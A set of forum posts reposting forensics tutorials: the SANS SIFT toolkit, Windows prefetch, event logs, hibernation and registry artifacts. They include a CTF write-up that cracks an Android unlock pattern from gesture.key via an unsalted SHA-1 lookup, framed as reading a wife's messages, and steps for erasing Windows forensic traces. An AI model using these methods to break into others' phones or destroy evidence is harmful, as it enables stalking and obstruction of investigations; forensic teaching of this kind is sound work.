forensics. Here it is: I have already covered the Volatility framework in detail here. Please check this out. Memory Forensics and Analysis Using Volatility - InfoSec Institute SANS Cheatsheets There are a few cheatsheets provided by SANS in SIFT to make forensic work pretty easy. It is recommended that you check them out. Command Line Tools There is further a long list of command line tools present under /usr/local/bin: Mobile Forensics SIFT comes bundled with mobile forensics tools such as Blackberry Analyzer and iPhone Analyzer which are pretty much effective. Reference Links for Parts 1 and 2 SANS SIFT Kit/Workstation: Investigative Forensic Toolkit Download https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcRWtZAbGq0mmcDk638vPrgMA9kmzugZDsG3qPoG2JSLMsaedlfR Maltego - Wikipedia, the free encyclopedia PTK Forensics - Wikipedia, the free encyclopedia www.basistech.com/conference/2010/osdf-slides/forte-ptk-forensics.pdf Source
  4. The SANS Investigate Forensic Toolkit (SIFT) is an interesting tool created by the SANS Forensic Team and is available publicly and freely for the whole community. It comes with a set of preconfigured tools to perform computer forensic digital investigations. This is based on Ubuntu and has a long list of tools for present forensic needs. We will have a walkthrough of some of the very famous tools used in forensic investigations. You can download the SIFT iso from this link: SANS SIFT Kit/Workstation: Investigative Forensic Toolkit Download It supports evidence formats such as raw format (.dd), encase image file format (E01), and advanced forensics format (AFF). Setup There are a few things that you might need for booting this up, such a VMware/ Virtual Box Good RAM, CPU and hard disk space SIFT ISO/ VM image You can simply boot the SIFT iso as a bootable disk or choose to install it as a complete operating system. The default login credentials are: username—sansforensics and password—forensics. This includes a long list of software, a few of which we would cover with a complete tutorial based on forensic analysis, such as: Autopsy DFF – Digital Forensic Framework EVTX – Event Log Viewer Maltego PTK Md5deep SANS Cheatsheets Volatility We will start with the forensic analysis tutorials with this tools from SIFT. Currently I have with me a raw dd image for our forensic analysis: Md5deep This is a small command line utility in SIFT that may be used for calculating MD5 hashes, comparing hashes, and playing around with them. Suppose we want to check if the integrity of our file is maintained: We can simply hash it and check. Any changes made to the file will change its MD5 hash. So let’s calculate an MD5 for our image file before doing the forensic analysis. You can see the MD5 calculated in the screenshot by our tool: Similarly, we can calculate MD5 for recursive files and play with many more options. For more information and usage, simply use man md5deep. We similarly have utilities such as sha1deep and sha256deep for calculating sha1 and sha256 hashes for integrity checking. Autopsy Now we move to the actual analysis of our image using Autopsy. This tool is the GUI front end for the Sleuthkit. Let us have a look. It is found under Applications > Forensics This what Autopsy looks like: Let us open a new case by clicking “New Case.” We have to fill in a few details to create a new forensic investigation case. We have successfully created a new case; let us move on to the next step. We add more details about the case and move forward. Now we move on to adding our image to the case for doing the forensic analysis. We give the location of the forensic image: Next, we can calculate MD5 hashes, also using Autopsy: Autopsy lists all of the file system details and the mmls tool (command line) output for us: Now we move on to the analysis part; click on “Analyze.” We do an analysis of the files in the C partition of the image: We can do a keyword search, metadata and view the contents of any sector in the file system. DFF—Digital Forensic Framework This is a really nice tool for doing digital forensic investigations, since it displays tons of information about the evidence. It is made of different modules based on Python that perform various steps in an investigation, such as file system module fatfs, ntfs to detect the file system. It has a viewer module to display text, images, etc. There are many more, such as Crypto, Hash, Databases, Statistics, etc. These are restricted to specific investigation; for example, the Hash module creates hashes for files to monitor file integrity and similarly the other modules. This time we take another forensic test image for contrasting the results and views better for the understanding of the readers, since this image specifically has images, doc files, txt files, etc. This is how DFF looks: Now we add an evidence file, which is a raw dd image of a USB drive. For doing this go to File > Open Evidence File: You can see that the evidence item has been added. Now we will simply try to analyze the file and the filesystem module automatically detects that it is a FAT file system and runs the fatfs submodule. Once we apply the fatfs module we can see the files under “Logical Files.” The files in red are the ones that were deleted from storage. We notice that all the files have been listed under the root partition. Since we just have one partition in this image we can see that this partition has image files, text, and document files. Now, in order to further analyze them, suppose an image file: We use the picture module: Similarly, we can use the module text to view our text files: EVTX—Event Log Viewer This is a really nice tool to audit Windows log files and forensically investigate them. Here I open an event log file extracted from Windows XP system in EVTX for my forensic investigation. Here is an image showing the description of an event and more information about it. In the image below, we see that this is an informational event, a source from MsiInstaller, and the product that was installed is Microsoft .NET Framework 3.5. Similarly, we can investigate if a suspicious installation had been done or not: In the next part we will cover the rest of the tools with SIFT. Source
  5. Cautand pe net am dat de un site foarte interesant. First time: https://www.skillset.com/authake/user/register (Register) Certifications : https://www.skillset.com/certifications #CEH examen: https://www.skillset.com/certifications/ceh #CISSP examen: https://www.skillset.com/certifications/cissp #PMP examen: https://www.skillset.com/certifications/pmp
  6. Introduction In this paper I’ll show you how to find an Android’s user pattern lock. I assume that the technique that I’ll demonstrate can work only on a rooted device. Actually, this article will be based on a problem given on a web-based CTF (Capture the Flag, a computer security competition). Problem statement: Having doubts about the loyalty of your wife, you’ve decided to read SMS, mail, etc., in her smartphone. Unfortunately it is locked by schema. In spite of this, you still manage to retrieve system files. You need to find this test scheme to unlock smartphone. You can find a link to download the full dump of system files on references sections. Abstract Nowadays many, if not all, smartphones offer, in addition to the traditional password lock protection, a pattern lock one, which is a mix of gestures done by the phone owner joining points on a matrix in order to unlock his phone. This “new security approach” lets you avoid any undesired taps on the device and it will be asked to authorize its access. This manipulation seems to be complicated and secure enough, which is totally wrong! If you have a closer look at what a pattern lock actually is and how it works, you can easily conclude that it’s no more than a 3×3 matrix with some built-in conditions: The pattern drawn by the user must contain at last four points and each point can only be used once; since it’s a 3×3 matrix, the maximum of points a lock pattern can contain is nine. Studying Pattern Scheme The 3×3 points of the pattern lock can be represented by numbers (digits); in fact, the points are registered in order starting 0 to 8 (top left corner is 0 and ending by 8): So the pattern used in the image above is 1 – 2 – 5 – 8 – 7 – 4. Statistically, it’s not a very big deal having all combination between 0123 and 876543210, its not even 0.2% of all possible nine-digit numbers and we should have about 895824 pattern scheme possibilities available in an Android device. Android devices do store pattern lock data in an unsalted SHA-1 encrypted bytes sequence format, using something similar to this code snippet in order to achieve this: private static byte[] patternToHash(List pattern) { if (pattern == null) { return null; } final int patternSize = pattern.size(); byte[] res = new byte[patternSize]; for (int i = 0; i < patternSize; i++) { LockPatternView.Cell cell = pattern.get(i); res[i] = (byte) (cell.getRow() * 3 + cell.getColumn()); } try { MessageDigest md = MessageDigest.getInstance("SHA-1"); byte[] hash = md.digest(res); return hash; } catch (NoSuchAlgorithmException nsa) { return res; } } This means that, for example, instead of storing directly 125874 it stores an encrypted byte array in a system file called gesture.key located in the /data/system folder. We can read most of this information directly on “The Android Open Source Project” java files * Generate an SHA-1 hash for the pattern. Not the most secure, but it is * at least a second level of protection. First level is that the file * is in a location only readable by the system process. * @return the hash of the pattern in a byte array. According to this piece of code, our sample pattern should be saved as 6c1d006e3e146d4ee8af5981b8d84e1fe9e38b6c The only little problem facing us now is that SHA-1 is a one-way cryptographic hash function, meaning that we cannot get the plain text from the hashed one. Due to fact that we have very finite possible pattern combinations and the other fact that Android OS does not use a salted hash, it does not take a lot to generate a dictionary containing all possible hashes of sequences from 0123 to 876543210. Problem solving We know enough to analyze the file system dump we’ve got; it’s not hard to find gesture.key and to explore its content: You can open it using any text or hexadecimal editor: The last thing to do right now is to compare the bytes of this file, 2C3422D33FB9DD9CDE87657408E48F4E635713CB, with values in the previously generated dictionary to find the hash that recovers the pattern scheme. A previously made dictionary can be downloaded in the reference section and, using any SQLite browser, you can easily find the original pattern scheme: Select * from RainbowTable where hash = “2c3422d33fb9dd9cde87657408e48f4e635713cb”. Which means that this is the pattern that unlocks the “wife’s device”: Conclusion There are no difficulties cracking or bypassing this kind of protection an Android-based device; the only real obstacle is that we cannot directly access the /data/system/ folder and gesture.key file except when we are dealing with a rooted device. This is done for fun and curiosity purpose since, if you have full access to a mobile, you can just remove or replace the file containing the SHA-1 hash with a prepared one; in addition to this, in most cases lock files are valueless from a forensic point of view. More complicated techniques could be used if the device is not rooted. We are talking about a physical dump of the memory chip and the use of some special hardware tools like Riff-Box and an JIG-adapter, but this is not our concern for now. References: The Android Open Source Project (LockPatternUtils.java) : https://android.googlesource.com/platform/frameworks/base.git/+/f02b60aa4f367516f40cf3d60fffae0c6fe3e1b8/core/java/com/android/internal/widget/LockPatternUtils.java Link to download the dictionary: SHA1-android-pattern Link to download the partial phone dump: chandroid Source
  7. 1. Introduction In this article, I’m going to focus on prefetch files, specifically, their characteristics, structure, points of interest in terms of forensic importance, uses, configuration, forensic value and metadata. They include the name of the executable which they accelerate, Unicode itemizations of the DLLs that the executable requires to function, timestamps which pinpoint when the application was last launched, and a counter that keeps track of the times that the executable has been launched, inter alia. Figure one reveals the four most important elements of a prefetch file in terms of forensic significance. Prefetch files can reveal that an application was actually installed and launched by the suspect at some point in time. Even if prefetch files unveil the presence of a wiping application like “Evidence Eliminator,” (a program with the purpose of thoroughly removing selections of data from the hard drive) and nothing else. That’s because the actual evidence was destroyed by the wiping application. The mere presence of a wiping application can itself become as incriminatory as the files that were destroyed with it. 2. Basics of Prefetch files Prefetch filenames have the following naming convention: {exename}-{hash}.pf Exename is the name of the executable, hash is an eight character hexadecimal hash of the path from which the executable was launched, and .pf is the file extension. Note that a dash separates the exename from the hash and that the filename ought to be made up of only uppercase characters with the exception of the file extension. Furthermore, when an application is started from three separate locations on the drive three distinct prefetch files will be created, each corresponding to one of the locations from which the application was run. Prefetching also exists in Windows Vista, where it has been enhanced by SuperFetch, ReadyBoost and ReadyBoot. SuperFetch logs usage scenarios and places resources into the memory before they are requested/ ReadyBoost is a disk cache which boosts processes by utilizing any type of portable flash mass storage system as a cache which enables the OS to service random disk reads with enhanced performance. ReadyBoost’s caching doesn’t only relate to the page file or system DLLs, but to the whole disk content. In a test case ReadyBoost increased the speed of an operation from 11.7 to 2 seconds. Although simply increasing the main memory from 512MB to 1 GB diminished the length of the operation to 0.8 seconds (without any reliance on ReadyBoost). Prefetching takes place when the OS (Windows Cache Manager, in particular) is monitoring components of data that is extracted from the hard drive into the RAM. The monitoring takes place on 3 occassions. First, it begins on every system startup and lasts for two minutes of the boot process. Second, it also takes place following the completion of the startup of all Win32 services and lasts for sixty seconds. Finally, it occurs each time an application is launched and lasts for the first 10 seconds of its execution. Subsequently, the Cache Manager, along with the Task Scheduler writes the data into .pf files. These files speed up the system by making themselves promptly available before there is any actual demand for them from the user. Hence, the prefetcher acts as an allocator of data from the hard drive into the main memory before any actual request for it has been made. Note that SSD drives have Prefetch turned off by default. 3. Prefetching configuration in the Registry Picture one below reveals the values of prefetching that can be configured in the registry. As it can be seen in the picture, the path to the configuration parameters of Prefetcher is HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParameters. To configure the Prefetcher, one has to change the value of EnablePrefetcher to one of the values mentioned below and to configure Superfetch, one has to do the same with EnableSuperfetch: 3: Enables Prefetcher/Superfetch for application startup and Boot 2: Enables Boot prefetching 1: Enables Prefetcher/Superfetch for application startup 0: Disables Prefetcher/Superfetch It can be deduced that cyber-criminals can disable their prefetch and get rid of prefetch files, effortlessly, to remove traces of illegal activity, such as opening an application filled with child pornography on a regular basis, or accessing copyrighted material without the relevant permissions. The only cost is the worsening of the performance of the system. Picture one: Configuration of Prefetcher and Superfetch in the Registry Editor (Windows 7) Superfetch files begin with the ‘Ag’ prefix and end with the ‘.db’ extension. The data that is written into Superfetch files is collected by Sysmain.dll, situated in %SystemRoot%/System32, and is a part of the Service Host process (Svchost.exe) which is situated in the same directory. The ‘.db’ files can be found in the %SystemRoot%/Prefetch (usually C:WindowsPrefetch) directory, along with the other prefetch files. Windows XP, Vista and Windows 7 perform application prefetching by default while Windows 2003 and 2008 are capable of performing prefetching though the feature is turned off by default. Also, every version of Windows, following Windows XP, does boot prefetching. [*]4. Structure of Prefetch files and metadata The metadata that prefetch files consist of is of particular relevance to forensic analysts. In Windows XP, the 64-bit time stamp indicating when the executable was last launched has an offset 0×78 within the file, and the counter that pinpoints the number of times the executable has been launched is a 4-byte DWORD value situated at offset 0×90 or 144 bytes. On the other hand, the offset of the last run time stamp is 0×80 in the binary contents of the particular prefetch file, and the “number of times opened” counter is situated at offset 0×98 in Windows Vista and Windows 7 systems. It’s also possible to dig up more data from the metadata of a prefetch file. Inside the prefetch file, there’s data revealing the volume from which the executable was started, and strings that show the path to the modules which the executable required to start. Figure two reveals some key information about the structure of prefetch files: Table one describes some preliminary characteristics of prefetch files: Integer values Strings Time stamps Kept in little-endian Kept in 16-bit Unicode Transformation Format (UTF-16), little-endian with no byte-order-mark Kept in Coordinated Universal Time (UTC) as Windows Filetime Table 1: characteristics Figure 2 is based on information gathered from David Koepi (http://davidkoepi.wordpress.com/2013/09/29/prefetch-forensic/ and two Forensics Wiki pages( Windows Prefetch File Format - ForensicsWiki and Prefetch - ForensicsWiki.) 5. Other points of interest in prefetch files Besides the obvious importance of prefetch files, answering when a certain activity has occurred (via the last execution time), what activity has taken place, how frequently it was performed (via the counter that shows the number of times the executable has ran which increments by one on each launch) prefetch files may reveal obfuscated directories. For instance, let’s say a prefeteched executable has been executed fifty times (notepad.exe). By examining the prefetch file, one can see the file path of the files that triggered this execution, (let’s say you stumble upon list6.txt) which is situated in a TrueCrypt volume. As TrueCrypt enables users to conceal directories, it’s vital to examine the paths enumerated in the prefetch files, as these may be a door towards a data source that would have not been otherwise identified. If the examiner didn’t look at the paths, they may have never identified the obfuscated directory with the C:WindowsSystem32Neohiddencreditcardslist6.txt path hidden with TrueCrypt. Because the System32 directory is filled with programs that are in use by the OS, and an ordinary person would have never checked its contents. Additionally, the full directory path enumerated in the prefetch file reveals the user accounts under the Users directory (for Windows Vista/7) and the Documents and Settings directory for Windows XP. An examination may unveil that there was a temporary account created with the purpose of performing criminal activity by pinpointing applications that were launched at some point in the past. It could be by an unauthorized or abnormal user, which would be an answer to the “who” question of an investigation. Furthermore, by examining the full paths enumerated in the prefetch files, one may see whether the program, application or file was launched from an external storage device as the entry would differ from the entry of an application accessed from the hard drive. Thereafter, the last execution time may be utilized for coordination with the USBStor registry key and if the time stamps match the USBStor registry key entry can be examined to get the serial number of the external storage device and this will aid in solving the “what” and “why” questions surrounding an investigation. When cyber criminals infiltrate a system and modify the timestamps of an application, they could be unaware of the data that prefetch files contain. If the cyber criminal alter the SIA and FNA time stamps in the Master File Table to hinder the examination. The entries in the prefetch files would remain unchanged and will pinpoint the real time stamps. In that way, examiners may thoroughly avoid the cybercriminal’s time stomping attempts. The Master File Table (MFT) is a file that the NFTS file system contains. The MFT has no less than one entry per file on the NFTS file system volume, it even has an entry for itself. These entries include data about each file such as the file’s size, permissions, contents and time and date stamps. The metadata is kept in one of two places: MFT entries Space separate from the MFT but which is defined by it. Thus, it’s no wonder why time stomping efforts aimed at the MFT is important. It’s an enormously large collection of valuable metadata. The prefetch files need to be examined to determine if there were possible time stomping attempts. 6. Summary and Conclusion To put it in a nutshell, prefetch files are designed to boost the speed of the system. In computers, the saying “speed kills” must be transformed into a negation, which becomes something like “the absence of speed kills.” Prefetching can be disabled and enabled as much as one wants, and each time the contents of prefetch files reset. Besides their primary purpose, prefetch files are useful for forensic examiners because they can prove that an application was installed and started on a particular machine. They can pinpoint the time when it was opened and how many times it was opened. They can reveal from which volume it ran and which modules the application loaded. Furthermore, prefetch files may also reveal any hidden or obfuscated directories, temporary, unauthorized or any other abnormal accounts. They may expose any external storage devices and they can pinpoint if there was time stomping. Therefore, prefetch files help examiners answer the “who”, “what”, “why”, “when,” and “where” questions that surround any digital or non-digital investigation. That certainly means that their analysis is of utmost importance. Figure three reveals the questions asked whenever a crime has to be investigated. That highlights the importance of prefetch files for solving cyber crimes, as a source of answers to these questions. References: Forensics Wiki, ‘Prefetch’, 21 Oct 2013. Available at: Prefetch - ForensicsWiki Forensics Wiki, ‘SuperFetch’, 3 Sept 2013. Available at: SuperFetch - ForensicsWiki Ryanmy, ‘Misinformation and The Prefetch Flag’, 25 May 2005. Available at: Misinformation and the The Prefetch Flag - Funny, It Worked Last Time - Site Home - MSDN Blogs Wikipedia, ‘ReadyBoost’, 17 Oct 2013. Available at: ReadyBoost - Wikipedia, the free encyclopedia Wikipedia, ‘Prefetcher’, 13 Oct 2013. Available at: Prefetcher - Wikipedia, the free encyclopedia Forensics Wiki, ‘Windows Prefetch File Format’, 21 Oct 2013. Available at: Windows Prefetch File Format - ForensicsWiki David Koepi, ‘Prefetch Forensic’, 29 Sept 2013. Available at: http://davidkoepi.wordpress.com/2013/09/29/prefetch-forensic/ Mark Wade, ‘Decoding Prefetch Files for Forensic Purposes, Part 1?, 12 Aug 2010. Available at: Decoding Prefetch Files for Forensic Purposes: Part 1 Windows Dev Center, ‘Master File Table’, 10 Dec 2013. Available at: Master File Table (Windows) Cory Altheide and Harlan Carvey, “Digital Forensics with Open Source Tools”, 2011 John Sammons, “The Basics of Digital Forensics”, 2012 Source
  8. Introduction This article begins with event logs and discusses their headers’ structure and the structure of their building blocks—the headers of the event records. It mentions some open source tools that can parse event logs and briefly explores event logs on versions of Windows below and above Windows Vista, along with an exploration of their characteristics. Links to pages of the MSDN are provided for further reference on event logging. Then the article continues with a brief examination of the three computer sleep modes (sleep, hibernation, and hybrid sleep) and their significance for forensic analysts. To enable you to picture this point, an explanation is given about what happens to information that is deleted from the computer with the standard “Delete” button or through the contextual menu. This explanation is useful in the context of the discussion as writing the data on the HDD makes it useful to forensic analysts beyond the point of deletion. Finally, we have provided a list of quick ways to remove artifacts from your Windows system. Removal of objects such as thumbs.db, hiberfil.sys, pagefile.sys, metadata, Index.dat is discussed in this chapter and it concludes with mentioning the names of a few programs that claim to permanently remove data from your computer. Event Logs Event logs have headers for the particular file and headers for the particular entries and both have the unique identifier (signature) “LfLe” included in their structure. Their length can be viewed as variable. Figure 1 reveals the structure of an entry header. Figure 1: This illustrates the structure of an event log’s entry header. It is based on the one provided by Jeff Hamm in his paper “Carve for Records, Not Files.” Available at: http://computer-forensics.sans.org/summit-archives/2012/carve-for-record-not-files.pdf Windows NT, 2000, XP, and 2003 use a logging system called event logging. The MSDN site contains information concerning the structures that make up event logs (http://msdn.microsoft.com/en-us/library/windows/desktop/aa363652(v=vs.85).aspx). These structures are all well-known and it is not difficult to write tools that parse the event records that these logs contain in a binary form and also extract them from the unallocated space. Parsing a binary form is valuable because the header clusters of the event log files may output a number of event records in the particular file, whereas if you parse it in a binary form extra event records may be produced. The Event Log file extension is “.evt.” Event log headers are 48 bytes long, marking the beginning of the event log, and they can contain very useful data for forensic examiners. The header can be used to validate the file; it includes starting and ending offsets, which contain data pinpointing where the most aged event record is situated to the Microsoft API and data showing where the ending record is situated, respectively. Records contained within event logs all have a unique identifier referred to by Microsoft as a signature; this identifier is “LfLe” and 0x654c664c in the hexadecimal notation. We mentioned previously that the headers of event log files are 48 bytes in size and that is additionally specified in the 4-byte DWORD value that brackets the header record (it can be located both in the record’s start and in its ending); in the given case, the value is 48 or 0×30, which is valuable to know because the event record’s header, as opposed to the event log file’s header, has a size of 56 bytes and does not have any of the real subject-matter of the file embedded in it. Event records are bracketed by size values as well. Offsets pointing to the strings, the lengths of strings, UserSID, where appropriate, and data input in the event entry are all parts of the event record’s structure and they reveal data about the entry itself. Furthermore, two time stamps are inserted in the event record’s header: one pinpointing when the particular event was generated or “came to life” and another showing when the event was written to the .evt. The gmtime() function in Perl can effortlessly transform the 32-bit Unix times of the time stamps into legible dates. One can make use of evtparse.pl, an open source tool, to parse the information from the relevant .evt files. Evtparse.pl simply extracts the data and outputs the event record information, while evtrtp.pl not only produces the event record data but also scans this data and outputs information concerning the regularity of different SIDs, sources for the event records, and the data range of all entries located in the file as well (statistics). Such information comes in handy when an analyst is searching for a bustle that happened on the machine at a given time. For instance, if an analyst parses an event log in search of a particular event ID or a specific event, he/she can see whether it is present within the file or whether the date range of the accessible event entries includes the exposed window or whether events of interest exist within the given time frame when the incident occurred and can save himself/herself a substantial amount of time by moving to a different source of data if the search brings no results. The latest editions of Windows (Windows Vista and later versions) resort to the Windows event log mechanism, which entirely replaces the event logging mechanism of the previous Windows versions, such as Windows NT, 2000, XP, and 2003. The Windows event log mechanism is much more complicated; specifics can be examined at the MSDN Windows Event Log Reference (http://msdn.microsoft.com/en-us/library/windows/desktop/aa385785(v=vs.85).aspx). Partially, the change that was done to the new Windows event log scheme is that the structure of the recorded events and the way they are recorded was modified. A tool based on the Perl high-level programming language was developed to parse Windows event logs on versions of Windows Vista and beyond, named evtxparse.pl. Modes of Computer Sleep and Deleted Data Background Computers, just like humans, need time to rest; alternatives to shutting the machine down are sleep and hibernation. From a user perspective, sleep/hibernation saves a considerable amount of energy and allows users to resume all processes and applications from where they left them off. Furthermore, sleep/hibernation may be safer than leaving the computer on when you are taking a lunch or a coffee break because, when the computer is awakened from its rest, it may be set to prompt for a username and password, although a simple log off would have the same effect if you decide to leave it on. When the computer is sleeping, it needs extremely small amounts of power to maintain and if a laptop’s battery gets critically low this sleep will be “transformed” to hibernation. There is an extremely large difference in the evidence that can be collected from the two states. Hibernation and hybrid sleep are considered “deep sleep” modes because they store the data related to the processes and applications running on the computer on the hard disk, instead of storing it in the main memory (sleep mode). There are three different modes of rest that computers can immerse into: sleep, hibernation, and hybrid sleep. Explanation: Deleted Data To get a picture of why sleep and hibernation differ enormously in importance for forensic examiners we will briefly discuss what happens when a user deletes data from his hard drive: User deletes a file(s). The computer receives the input from the relevant input device (keyboard/mouse, etc.) The computer marks the space that the file(s) occupied as available. The “removed” file(s) remain(s) untouched until a new one take its/their place and overwrites it/them Basically, what happens is that the file moves from the allocated space to the unallocated space. Allocated space can be explained as being all the files that we can view and execute in Windows. All files located in the allocated space cannot be overwritten as the section of the hard drive where they are located is reserved for them; new files can only be stored in the unallocated space (on standard computers). Thus, if you have a 1 TB HDD with 500 GB of allocated space and you delete an incriminating document that holds 5 MB of space, you will be left with 523.999023 GB unallocated space on raw calculations and 523.475024 GB if you take into account the fact that HDDs start with 99.9% unallocated space, which means that a very long period of time may pass before the 5 MB that held the incriminating document gets overwritten by new files. Usually, files in the unallocated space are identified by means of their distinctive features. Examples of these distinctive features (or signatures) are file headers and footers that may identify files and signal both their beginning and end. The process of extracting data from the unallocated space is called “file carving” and it is usually performed via tools but it can also be performed manually. However, we will discuss file carving in a separate article. Sleep Microsoft likens sleep to “pausing a DVD player” (Microsoft’s Windows sleep and hibernation FAQ), as its function is to resume the processes and programs running on the computer as promptly as possible (besides conserving energy). What happens in sleep mode is that a minute amount of power gets constantly fed to the main memory, which conserves the data unimpaired. However, the main memory (or RAM) is a volatile memory, so the data vanishes as soon as the power is removed. Therefore, sleep is not a great source of evidence for forensic examiners. Hibernation Hibernation uses the least amount of power of the three sleep modes. In hibernation, the computer creates a snapshot of all the data in RAM and writes it on the HDD. Nevertheless, it is mostly designed for laptops, not desktops. MoonSols Windows Memory Toolkit enables forensic analysts to read and write the Windows hibernation file. Hybrid sleep It can be inferred from its name that hybrid sleep is a mixture of the modes “sleep” and “hibernation”; it is intended for desktops rather than laptops. In this mode, the computer preserves insignificant amounts of power applied to the machine’s RAM (to maintain the data and the applications present before the hybrid sleep) and writes this data to the HDD. Suspects might miss these hibernation files and the page file(s) as they are unknown to many computer users and are frequently neglected during last minute “delete-a-thons.” Erasing Windows Artifacts In this section, we provide a few methods of erasing artifacts. Thumbs.db, which is a cache in Windows that stores thumbnail images of all graphics files and is a valuable Windows artifact, can be disabled by clicking Start -> Control Panel -> Folder Options -> View -> check the button “Always show icons, never thumbnails” in the Files and Folders section -> Apply -> OK. This action will stop thumbs.db from reappearing after being deleted (this procedure for disabling it is for Windows Vista and Windows 7). Thumbs.db can also be deleted in Windows XP by clicking on My Computer -> Tools -> Folder Options -> View -> check “Do not cache thumbnails” -> OK. However, performance will drop when you browse through your hard drive’s partition’s contents. There are numerous thumbs.db files scattered across your computer and you will only see them if you enable the “Show Hidden Files and Folders” option in Windows. Also, the evidence that may be piled up in the hibernation’s file hiberfil.sys (all processes, programs, applications and files opened in a given session are written to the hard drive when you put your computer in hibernation) may be removed without the file coming back by disabling the hibernation function. You disable it by opening the command prompt with administrative privileges and typing “powercfg.exe –h off” (for Windows Vista, Windows 7, and Windows XP). Furthermore, free programs such as Index.dat Analyzer can remove all Index.dat files present on the computer until Windows recreates them. Index.dat is an invaluable source of data for forensic analysts, as it stores data on each website you open. Websites offering services like search engines and online banking are kept in such files, as well as e-mails that you have sent through Microsoft Outlook and Microsoft Outlook Express. Index.dat files are cloaked and not hidden, so you will be unable to access them through the Windows built-in “Find” or “Search” option and they are not shown because cloaked files are handled in a different way than hidden files. Furthermore, files with the index.dat name are being constantly utilized while Windows is in use, so it is impossible to remove them without leaving Windows first. The deletion options embedded in IE do not enable you to remove index.dat files and the only other option to deleting index.dat outside of Windows is killing the explorer.exe process and starting a command shell. Figure 2: Index.dat Analyzer’s interface. In Figure 2, we see Index.dat Analyzer ready to remove entries in an IE’s index.dat file. Index.dat Analyzer can remove an entry or numerous entries if you check them in the box on the left of the screen, or it can delete the whole index.dat file. Importantly, you can also view separate entries stored in the file, and you can add other index.dat files to the list of entries. In this particular picture, we see that each Skype contact’s avatar is stored in the index.dat file. This particular index.dat file has 5209 entries although IE has been left largely unused on the given machine. There may be index.dat files that are not related to Internet Explorer but to other programs and there may be several index.dat files for IE, depending on whether their purpose is storing the browser’s history, cache, or cookies. After deletion, index.dat will be created again but its contents would start from blank so any sensitive data on it would be lost. Figure 3 – A view of an entry of Index.dat’s cache of an image originating from Facebook Pagefile.sys is a hidden file that is used when the user has used up the existing RAM on his machine; it serves as a virtual memory file. It is basically resorted to when Windows needs more memory, in which case it turns to the HDD in the form of pagefile.sys for more space and, because the hard drive is much slower than the RAM, running many programs at once would cause the system to slow down. What it does is that, when an application is taking too much memory, most unused processes in RAM get placed into pagefile.sys so there may be more memory for the programs that you are actually working with. Thus, once you get rid of it and you have insufficient RAM, the processes and programs that you are running are going to break down without giving you time to save or do anything, among other issues that may arise. You may try is disable pagefile.sys, delete it, and enable it again to recreate the pagefile.sys but this is somewhat pointless, as explained below. Similarly to hiberfil.sys, pagefile.sys stores the processes that were running in your RAM at a given time, though the difference is that pagefile.sys does not store everything that was in your RAM at a given moment. To disable paging go to Start -> Control Panel -> Systems -> Advanced System Properties -> click on the Advanced tab -> Performance -> Settings Performance options -> go to another tab “Advanced” -> Virtual Memory -> Change -> pick a system drive and choose no paging file followed by the OK/Apply button. Finally, restart the machine. Note that pagefile.sys is quite important for the decent performance of the system and there might be no need to reset its contents as pagefile.sys is going through constant changes as you use your computer. Furthermore, users can minimize metadata. The process is easy for MS Office applications like Excel, PowerPoint, and Word. The user simply clicks File -> Check for Issues -> Inspect Document, inspects it for metadata, and deletes the parts that he wants to get rid of. Figure 4: Checking a Word document for available metadata Figure 5: Using MS Word’s Document Inspector to remove the file’s metadata Lastly, there are gazillions of tools that promise to remove permanently data from your HDD by overwriting it numerous times. Examples are Eraser, Sdelete, and Evidence Eliminator, among many others. We have restrained ourselves in this point to discussing the removal of several artifacts, but others can also be removed, to some extent, by cyber-criminals. Conclusion It can be concluded from our discussion so far that Windows users leave a lot of tracks on their machine when they perform their daily chores. These tracks can be extracted by forensic analysts and utilized as evidence. Fortunately, few cyber-crooks manage to erase all of them from their machine and even fewer know about all of these potential tracks. Lastly, it can be inferred from the context of our discussions that even people who sell their second-hand computers on eBay should be cautious because sensitive information can easily be leaked to curious buyers. References: Cory Altheide and Harlan Carvey, “Digital Forensics with Open Source Tools,” 2011 John Sammons, “The Basics of Digital Forensics,” 2012 Windows, “Sleep and hibernation: frequently asked questions.” Available at: Sleep and hibernation: frequently asked questions Where is your data, “What is unallocated space?” Available at: What is unallocated space? | Where is Your Data? Wikipedia, “Hibernation.” Available at: Hibernation (computing) - Wikipedia, the free encyclopedia rhiannon, “What are Thumbs.db Files and Can I Delete Them?” Available at: What are Thumbs.db Files and Can I Delete Them? (Windows) Bill Detwiler, “Delete Hiberfil.sys by disabling Windows Hibernate function.” Available at: Delete hiberfil.sys by disabling Windows Hibernate function - TechRepublic Wikipedia, “Index.dat.” Available at: index.dat - Wikipedia, the free encyclopedia n|u – The Open Security Community, “Windows Forensic Artifacts.” Available at: Windows forensic artifacts Lifehacker.com, “Understanding the Windows Pagefile and Why You Shouldn’t Disable It.” Available at: Understanding the Windows Pagefile and Why You Shouldn't Disable It Jeff Hamm, “Carve for Records, Not Files.” Available at: http://computer-forensics.sans.org/summit-archives/2012/carve-for-record-not-files.pdf Source
  9. Introduction Learning about artifacts in Windows is crucial for digital forensics examiners, as Windows accounts for most of the traffic in the world (91.8 of traffic comes from computers using Windows as their operating system as of 2013) and examiners will most likely encounter Windows and will have to collect evidence from it in almost all cyber-crime cases. Below, we will discuss several places from which evidence may be gathered and ways to collect information from Windows. Windows actually provides a great abundance of artifacts and being aware of these artifacts is helpful not only for examiners but for companies and individuals (just to name a few reasons) trying to permanently and irrevocably erase sensitive information or perform informal investigations. Before we start, we have to mention that collecting evidence is not the sole challenge to examiners; the challenge is to locate and identify, collect, preserve, and interpret the information; whereas collecting it is only one piece of the puzzle. In this paper, we will only be able to have a glimpse of this wealth of artifacts but its forensic significance will be immediately unveiled to us. The things you will find in this article In the first part of this series we are going to discuss the Windows registry, its structure, backups and supporting files, examples from case files which reveal how instrumental the registry might be in prosecuting suspects, and some open source tools. Registry What is the Windows registry and what is its structure? The Windows registry is an invaluable source of forensic artifacts for all examiners and analysts. The registry holds configurations for Windows and is a substitute for the .INI files in Windows 3.1. It is a binary, hierarchical database and some of its contents include configuration settings and data for the OS and for the different applications relying on it. The registry not only keeps records of OS and application settings but it also monitors and records user-specific data in order to structure and enhance the user’s experience during interactions with the system. Most of the time users do not interact with the registry in a straightforward manner, but they interact indirectly with it via installation routines, applications, and programs, such as Microsoft Installer files. Nonetheless, system admins have the capability of interacting directly with the registry via regedit.exe (the registry editor) that comes with all varieties of Windows. Figure 1: How the Windows registry looks like through the eyes of the registry editor, along with the registry’s nomenclature. Figure 1 gives the impression that the structure of the registry is the much familiar 